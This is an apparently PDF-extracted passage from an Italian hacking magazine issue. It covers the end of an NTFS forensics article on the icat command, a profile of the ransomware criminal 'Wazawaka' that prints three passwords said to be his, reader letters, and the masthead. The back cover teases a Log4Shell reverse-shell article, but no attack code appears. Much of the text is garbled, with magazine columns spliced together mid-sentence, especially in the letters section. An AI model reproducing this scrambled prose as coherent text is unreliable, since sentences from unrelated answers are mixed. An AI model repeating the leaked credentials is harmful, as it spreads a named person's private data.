una vera e propria hj.txt [figura #11]. In questo caso,
istantanea del file si tratta di contenuti inseriti
[figura #10], direttamente all’interno
che spazia dalla dell’entry MFT del file: l’attributo
directory di $DATA di hj.txt è residente, come
appartenenza abbiamo avuto modo di appurare
(la root directory, grazie al comando istat.
identificata tramite Ma icat è ugualmente efficace
l’indice del relativo anche nel caso in cui il contenuto
file record, che è per del file sia memorizzato nell’area
l’appunto 5) alla dati: se non ci credete, provate
dimensione (appena il comando
31 byte effettivi,
a fronte di 32 allocati), passando > icat chiavetta.dd 64
per lo stato di allocazione (si tratta,
chiaramente, di un file non che fa riferimento al file dd.txt.
cancellato) e i tempi d’accesso. E non finisce qui: icat è in grado
(entro certe condizioni) di
SÌ, MA IL CONTENUTO? visualizzare persino il contenuto di
siamo in grado di ricostruire tutte storia, e richiede un’altra puntata
le informazioni relative a un file, per essere raccontata…
figura #11
Il comando icat visualizza a video i contenuti di un file individuato
mediante l’indice del relativo file record.
57 
 HACKULTURE

L’ha ck e r fo
l a
l
r
l e
e
senza a n u
Dietro al nick Wazawaka si cela uno dei più importanti
criminali nell’ambito del ransomware che adesso
sembra essere completamente impazzito

C
on un lavoro di
intelligence fatto da un
team di esperti è stato
identificato il
cybercriminale che si nascondeva
dietro al nick “Wazawaka”:
è un criminale russo di prima
grandezza, che ha lavorato alla
creazione di una serie piuttosto
ampia di ransomware. La polvere
digitale non si è ancora posata su
questa indagine ma già emergono
fatti nuovi che non mancheranno
di suscitare polemiche.
IL BROKER DI ACCESSI
Mikhail Pavlovich Matveev,
trent’anni di Abakan, in Russia, è
l’uomo dietro al nick (e a molti altri
nomi usati in Rete) che ha passato
gli ultimi dieci anni partecipando
in maniera molto attiva a vari
gruppi e forum del cybercrimine.
È stato a lungo su Exploit, dove
vendeva attacchi DDoS per 80
dollari al giorno, attacchi capaci
di buttare giù siti protetti da CDN
professionali. E poi è entrato
dentro database aziendali, ha
tirato giù sistemi di sicurezza
piuttosto conosciuti, ha compiuto
vari atti di cybersabotaggio.
ECCO IL BOSS!
Nel 2020 ha venduto gli accessi per
una multinazionale cinese che vale
10 miliardi di dollari di fatturato:
si poteva entrare e fare tutto.
“Mostrategli chi è il boss” era stata
la sua firma all’operazione. Ma non
è questo l’unico caso in cui si è
Il cybercriminale usa tre password
per tutti i suoi account: “2k3x8x57”,
“2k3X8X57” e “00virtual”
distinto. Ha guadagnato almeno
500.000 dollari di commissioni per
LockBit e un altro programma di
ransomware che ha contribuito a
scrivere. E assieme a quelli di
DarkSide ha fatto andare giù per
sei lunghissimi giorni la Colonial
Pipeline, un sistema di oleodotti
americano che trasporta benzina
e carburante per aerei, cosa
che ha provocato effetti a catena
tra cui scarsità di carburante
e prezzi alle stelle.
UNA TAGLIA IMPORTANTE
Il Dipartimento di Stato è disposto
a pagare 5 milioni di dollari per
avere informazioni su lui e gli altri

 58
 HACK E FOLLIA
È un marchio di fabbrica
che lo rende
identificabile: l’anulare
sinistro mancante per
una scommessa.

Richieste di riscatto, scatti di

rabbia, risse digitali, minacce
e poi prese in giro, improvvisi
cambi e Gigabyte su Gigabyte
di dati riservati finiti nei forum,
alla portata di tutti.

affiliati di DarkSide. Ma finora
non l’hanno preso e con lo
pseudonimo di “Uhodiransomwar”
fino a poco tempo fa postava
database delle aziende che non
pagavano il riscatto dei dati
bloccati dai suoi ransomware.
LA FOLLIA SENZA FINE
Negli ultimi tempi, però,
il cybercriminale sembra aver
sbroccato. Nel buio della follia
dove è precipitato Wazawaka,
dopo aver guidato il programma
di affiliazione per il ransomware
DISTRUGGERE TUTTO E TUTTI
Sarà stata l’avidità o la semplice
cattiveria, ma la scia di attacchi
e le richieste di riscatto milionarie
del pirata sono diventate sempre
più numerose nel corso del
2020-2021. Dal Dipartimento
di Polizia della città di
Washington al Museo nazionale
russo, passando per decine di
altre istituzioni e organizzazioni,
gli attacchi si sono moltiplicati e
così le identità e gli alias usati da
Wazawaka per “parlare”.
CACCIA AL LADRO
Una taglia da 5 milioni di dollari
può essere vista come un grande
risultato per un criminale
professionista, oppure una
tremenda iattura. Tutti gli amici
si trasformano in potenziali
delatori, e nei forum chi conosce
qualcosa in più, magari qualche
particolare sfuggito in una chat
privata, può essere tentato
di metterlo a frutto e andare
all’incasso. La fuga nella follia
di Wazakawa può essere anche
questo: una fuga dalla normalità
per proteggere una situazione
altrimenti critica. Adesso non
ci sono notizie di un arresto
imminente e la guerra complica
tutto, ma gli atti criminali del
cybercriminale rimangono nella
storia del cybercrime, in attesa che
la giustizia faccia il suo corso.

Babuk (poi Orange) e il forum
dark RAMP, ha
cominciato a pubblicare
il codice di un exploit per
una VPN molto usata e strani
selfie in cui mostra di non avere
il dito anulare della mano sinistra.
Si sarebbe tagliato il dito da solo,
dopo aver perso una scommessa
e per gli esperti è la prova
della sua identità.
Perle ai porci
C osa fai quando hai un malloppo che scotta? Cosa fai quando
il proprietario dei dati si rifiuta di pagare il riscatto? Sembra che
Wazawaka abbia adottato il punto di vista più estremo secondo il quale,
quando le organizzazioni tenute in scacco rifiutano di collaborare o pagare,
tutti i dati rubati alla vittima vengono pubblicati sui forum russi della
criminalità informatica affinché tutti possano saccheggiarli, evitando che
possano essere venduti privatamente al miglior offerente. In un thread
dopo l’altro sul forum del crimine XSS, l’alias “Uhodiransomwar” di
Wazawaka ha pubblicato decine di link per il download dei database
con le informazioni delle aziende che si sono rifiutate di negoziare.

59 
 N E@ H AC KE RJ O U RN A L .i t
REDAZIO
REPLY
GLOSSARIO
DI BASE
COOKIE STEALER
Gli stealer sono malware
che rubano informazioni
dai browser, in questo caso
i cookie. Appropriandosi dei
dati personali presenti nei
cookie, i pirati informatici
possono assumere
il controllo della sessione
dell’utente e ottenere
informazioni riservate.
PYTHON
Linguaggio di
programmazione di alto
livello, adatto a sviluppare
applicazioni distribuite,
scripting, computazione
numerica e system testing.
Supporta la programmazione
a oggetti ed è adatto
a principianti ed esperti.
DVB-T2
Acronimo di Digital Video
Broadcasting Second
Generation Terrestrial,
è lo standard di ultima
generazione per le
trasmissioni sulla
piattaforma del digitale
terrestre televisivo.
2FA
Acronimo di Autenticazione
a due fattori, è un sistema
di riconoscimento che si
basa sull’utilizzo congiunto
di due metodi di
identificazione individuali.
 60
Condividi i tuoi dubbi co
a nuove idee e suggeri
vedere sulla rivista: re
ELIMINAZIONE
DEFINITIVA SU ANDROID
Voglio vendere il mio vecchio
smartphone Android, ma non
posso permettermi che chi lo
acquista riesca a recuperare
qualche file. Sono preoccupato
perché ho letto che sui supporti
Flash è facile recuperare i file
cancellati. Voi non riuscite
a consigliarmi un’app che me
li elimini definitivamente? senza chiedermi però un vero
 Santo
In realtà se hai crittografato
il tuo smartphone Android
dalle Impostazioni di sicurezza
e poi lo hai ripristinato alle
impostazioni di fabbrica,
le possibilità di recuperare
qualsiasi file sono praticamente
nulle. Per maggiore sicurezza
puoi comunque scaricare dal Play
Store un’app come Secure delete
dedicata all’eliminazione definitiva
di immagini e filmati.
CI SONO CASCATA ANCORA
Nonostante sappia benissimo
che non bisogna mai cliccare
su link ricevuti per posta
di cui non si conosca con
certezza il mittente, mi sono
fatta ingannare da quella
che pensavo fosse una
comunicazione di DHL, visto
che stavo aspettando un
pacco. Così ho cliccato sul link
n la redazione insieme
rresti
menti su quello che vo
al.it
dazione@hackerjourn
ricevuto via email per sapere
dove si trovava il mio pacco
e mi sono accorta subito che
qualcosa non andava visto che
si è aperto Chrome e si sono
installate diverse estensioni.
A distanza di qualche minuto
ho poi ricevuto un messaggio
su Discord in cui mi veniva
comunicato il mio indirizzo IP
e altre informazioni private
e proprio riscatto. A questo
punto mi chiedo se mi
convenga formattare il
sistema per evitare eventuali
altri guai, oppure se può
bastare un controllo accurato
con un buon antivirus.
Lisa
La soluzione migliore
rimane, in questi casi,
quella di formattare reinstallare
il sistema operativo. Se però
i problemi si sono limitati
all’installazione di qualche
estensione per Chrome noi
inizieremmo a ripristinare
completamente il browser per
evitare la presenza di uno stealer
di cookie e soprattutto
attiveremmo (se ancora non ce
l’hai) la funzionalità 2FA, cioè
l’autenticazione a due fattori,
in tutti i tuoi account. Infine
faremmo comunque una
scansione completa del disco
 O R IE IN A N O N IM O
LEGGERE LE ST
Avrei bisogno di sapere se esiste un modo per leggere le storie
di Instagram senza essere registrato e anche se è possibile
scaricare sullo smartphone le stesse storie e magari anche
i commenti. Allo stesso modo vorrei sapere se c’è la possibilità
di aumentare i miei follower senza doverli acquistare.
Lello

Sbirciare, o lurkare come si dice spesso con un inglesismo, i contenuti social

in maniera anonima è una richiesta abbastanza comune come dimostrano le
diverse app moddate di Instagram disponibili sul Web. Tra le altre ti consigliamo
GBInsta che potrai scaricare dall’indirizzo https://gbinsta.com/. Per quanto
riguarda la richiesta di aumentare i follower, se non vuoi ridurti a comperarli, ti
suggeriamo di usare metodi social efficaci come seguire e mettere like e commenti
su foto di altri utenti che ricambieranno a loro volta con un follow e soprattutto
inserire diversi hashtag molto popolari e attinenti alla tua foto. Esiste anche un
sito, https://top-hashtags.com/instagram, che mostra gli hashtag più popolari.

a meno... Possibile che non

Per scovare un file torrent senza farci
esista un software in grado di
infestare dallo spam presente nel Web, individuare in autonomia i vari
è possibile utilizzare un software Open torrent senza passare dal Web?
Aldo
Source con motore di ricerca integrato
Prima di tutto ti dobbiamo
utilizzando un antivirus specifico su Internet indicando il modello ricordare che, anche
come Malwarebytes. del tuo TV, anche se nella maggior se per uso personale, non è legale
parte dei casi i PIN preimpostati scaricare video e film protetti
HO PERSO IL PIN DEL TV! sono quelli classici: 0000, 1234 da diritto di autore.
Dovendo risintonizzare i canali o simili. Se non dovessi trovarlo Oltretutto il rischio è proprio
del mio televisore LG a seguito online ti suggeriamo di resettare quello di arrivare su siti malevoli
dell’entrata in vigore definitiva il televisore, potrebbe esserci e magari di beccarsi qualche
dello standard DVB-T2, mi sono stato un qualche bug di sistema malware. Fortunatamente
accorto che il TV richiedeva o più probabilmente un bug esistono diversi software in grado
un PIN a 4 cifre per svolgere con la tua memoria... di cercare autonomamente
l’operazione. Il fatto è che io i torrent inserendo alcune parole
non ricordo assolutamente di SCOVARE IL TORRENT chiave. Tra i migliori c’è
averlo mai inserito. Ho provato Da qualche mese ormai qBittorrent, https://www.
con le classiche combinazioni i classici siti che utilizzavo qbittorrent.org/, Open Source
standard ma niente da fare! per cercare i file torrent di serie e multipiattaforma, che integra
Paolo e film funzionano malissimo, un motore di ricerca sviluppato
rimandano a spam e pagine in Python ben integrato con un
Se sei sicuro di non avere pubblicitarie e tendono sistema di ricerca simultanea
modificato il PIN, a installarmi in automatico nei più famosi siti di
ti consigliamo di fare una ricerca estensioni di cui farei volentieri indicizzazione di file torrent.

61 
 Il prossimo nu mero iug no
g
sa ra‘ in ed icola da l 3
La falla
nelle blocaksocttrharraein
milioni
Un hacker è riuscito
te... ecco come
di dollari in cryptomone

NTFS fore nsics

e quando
Cosa succed
cancelliamo un file?

La guida per
Giovani pirati diventare...
La storia
del gruppo di pirati
Anonymous
ato
informatici che ha colpito
Il collettivo ha pubblic
per entrare in Rete
i giganti della tecnologia gli strumenti da usare moli assieme!
sotto la guida “senza volto”... scopria
di un minorenne

Mensile - prezzo di copertina 3,90 €
www.hackerjournal.it - [email protected]
La Divisione Informatica di Sprea edita anche:
WIN MAGAZINE ✦ LINUX PRO ✦ UBUNTU FACILE
MAC MAGAZINE✦ APP JOURNAL ✦IL MIO COMPUTER IDEA
Business Unit Manager: Massimiliano Zagaglia
Cover: Luca Patrian
Impaginazione: Andrea Carpani
Hanno collaborato: Antonio Dini, Francesco Pensabene, Maurizio Russo, Noemi
Chierchia, Roberto Premoli, Vincenzo Digilio, Servizi editoriali: Backdoor di Gianmarco Bruni
Sprea S.p.A.
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia
PI 12770820152- Iscrizione camera Commercio 00746350149
Per informazioni, potete contattarci allo 02 924321
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato),
Giulia Spreafico (Divisione digital), Stefano Pernarella (ADV & PR)
ADVERTISING, SPECIAL PROJECTS & EVENTS
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - [email protected]
SERVIZIO QUALITÀ EDICOLANTI E DL Distributore per l’Estero: SO.DI.P S.p.A. Via Bettola, 18 - 20092 Cinisello Balsamo (MI)
Sonia Lancellotti, Virgilio Cofano, Luca Majocchi: Tel. 02 92432295 Tel. +390266030400 - Fax +390266030269 - [email protected] - www.sodip.it
[email protected] 351 5582739
Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno
ABBONAMENTI E ARRETRATI
Abbonamenti: si sottoscrivono on-line su www.sprea.it/hackerjournal Copyright: Sprea S.p.A.
[email protected] Informativa su diritti e privacy
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00) La Sprea S.p.A. titolare esclusiva della testata Hacker Journal e di tutti i diritti di pub-
Il prezzo dell’abbonamento è calcolato in modo etico perché sia un servizio blicazione e di diffusione in Italia. L’utilizzo da parte di terzi di testi, fotografie e dise-
utile e non in concorrenza sleale con la distribuzione in edicola. gni, anche parziale, è vietato. L’Editore si dichiara pienamente disponibile a valutare -
e se del caso regolare - le eventuali spettanze di terzi per la pubblicazione di immagini
Arretrati: si acquistano on-line su www.sprea.it/arretrati
di cui non sia stato eventualmente possibile reperire la fonte. Informativa e Consenso
[email protected]
in materia di trattamento dei dati personali (Codice Privacy d.lgs. 196/03). Nel vigore
Tel. 02 87168197 (lun-ven / 9:00-13:00 e 14:00-18:00)
del D.Lgs 196/03 il Titolare del trattamento dei dati personali, ex art. 28 D.Lgs. 196/03,
329 3922420 è Sprea S.p.A. (di seguito anche “Sprea”), con sede legale in Via Torino, 51 Cernusco sul
Naviglio (MI). La stessa La informa che i Suoi dati, eventualmente da Lei trasmessi
FOREIGN RIGHTS alla Sprea, verranno raccolti, trattati e conservati nel rispetto del decreto legislativo
Paolo Cionti: Tel. 02 92432252 - [email protected] ora enunciato anche per attività connesse all’azienda. La avvisiamo, inoltre, che i Suoi
dati potranno essere comunicati e/o trattati (sempre nel rispetto della legge), anche
all’estero, da società e/o persone che prestano servizi in favore della Sprea. In ogni
SERVIZI CENTRALIZZATI
momento Lei potrà chiedere la modifica, la correzione e/o la cancellazione dei Suoi
Art director: Silvia Taietti
dati ovvero esercitare tutti i diritti previsti dagli artt. 7 e ss. del D.Lgs. 196/03 mediante
Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni,
comunicazione scritta alla Sprea e/o direttamente al personale Incaricato preposto al
Marcella Gavinelli, Luca Patrian trattamento dei dati. La lettura della presente informativa deve intendersi quale pre-
Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali
sa visione dell’Informativa ex art. 13 D.Lgs. 196/03 e l’invio dei Suoi dati personali alla
Amministrazione: Erika Colombo (responsabile), Irene Citino, Désirée Conti, Sprea varrà quale consenso espresso al trattamento dei dati personali secondo quanto
Sara Palestra - [email protected]
sopra specificato. L’invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A.
Ufficio Legale: Francesca Sigismondi deve intendersi quale espressa autorizzazione alla loro libera utilizzazione da parte di
Sprea S.p.A. Per qualsiasi fine e a titolo gratuito, e comunque, a titolo di esempio, alla
Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. pubblicazione gratuita su qualsiasi supporto cartaceo e non, su qualsiasi pubblicazio-
ISSN 1594-5774 ne (anche non della Sprea S.p.A.), in qualsiasi canale di vendita e Paese del mondo.
Direttore responsabile: Luca Sprea
Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.l. - 20090 Segrate Il materiale inviato alla redazione non potrà essere restituito.
hackerjournal.it

Il punto di riferimento per chi fa dell’hacking

una filosofia di vita
La crew di Hacker Journal ti aspetta ogni giorno sul suo nuovo sito Web, il ritrovo della sua ricca comunità
hacker. Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali e
un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza.
In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle
pagine della rivista e sul suo sito scoprirai come difenderti e contrattaccare. #HJisBACK

Scopri il sito e la comunità di Hacker Journal

Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ
• News: le ultime notizie su cyberintrusioni, furti
di credenziali, bug, malware e altro ancora
• Contest: metti alla prova le tue conoscenze
con i giochi e le sfide della redazione
• Collezione HJ: i vecchi numeri della rivista,
in PDF, da scaricare
• Invia un articolo: ti piace scrivere e hai un’idea
originale per un articolo? Inviacela e la valuteremo!
 PU BBLICITÀ
100% INDIPENDENTE! NO

T utto quello
ch e g l i a l t r i
n o n o s a n o d i r t i !

IN QUES T O N U M E R O
VULNERABILITÀ | Una reverse shell dai log
Il bug Log4Shell consente a chiunque di prendere il controllo
di una macchina su cui è presente un applicativo Java

SORVEGLIANZA WI-FI | Monitorati e schedati

Seconda e ultima parte del progetto che ci porterà ad avere un tracciatore
di smartphone personalizzabile usando un SoC e un po’ di codice

FILESYSTEM | Alla scoperta di NTFS!

Nozioni e strumenti per scoprire come vengono conservati i file
in NTFS, il filesystem tipico dei sistemi Windows

LETTERE | Leggere le storie in anonimo

Le domande dei lettori, le risposte degli esperti della redazione.
Anche online sul nostro sito: https://hackerjournal.it

NUMERO 262 • MENSILE • 3.90 €

P.I. 03-05-2022 - Maggio

Prezzi esteri: AUT € 7,50 - BE € 7,00 - LUX € 6,50 - F+PM € 9,50 FR + € 10,50 PM - ES € 6,00 - PT (Cont.) € 5,50 - CH Tedesca CHF 8,3 - CH Ticino CHF 7,3 - OLANDA € 7,50